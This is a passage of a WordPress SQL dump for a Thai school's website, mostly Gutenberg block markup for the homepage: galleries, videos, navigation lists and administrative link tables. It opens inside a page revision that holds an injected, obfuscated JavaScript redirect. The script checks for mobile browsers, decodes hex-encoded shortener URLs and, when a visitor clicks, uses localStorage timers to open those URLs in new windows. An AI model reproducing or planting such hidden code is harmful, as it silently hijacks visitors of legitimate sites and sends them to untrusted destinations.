)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:13:37','2024-07-27 05:13:37','',14,'http://pakhaeng.ssk.in.th/?p=140',0,'revision','',0),
(142,1,'2024-07-27 12:14:41','2024-07-27 05:14:41','','สุขาดี','','inherit','','closed','','%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%b2%e0%b8%94%e0%b8%b5','','','2024-07-27 12:14:41','2024-07-27 05:14:41','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4',0,'attachment','video/mp4',0),
(143,1,'2024-07-27 12:14:44','2024-07-27 05:14:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 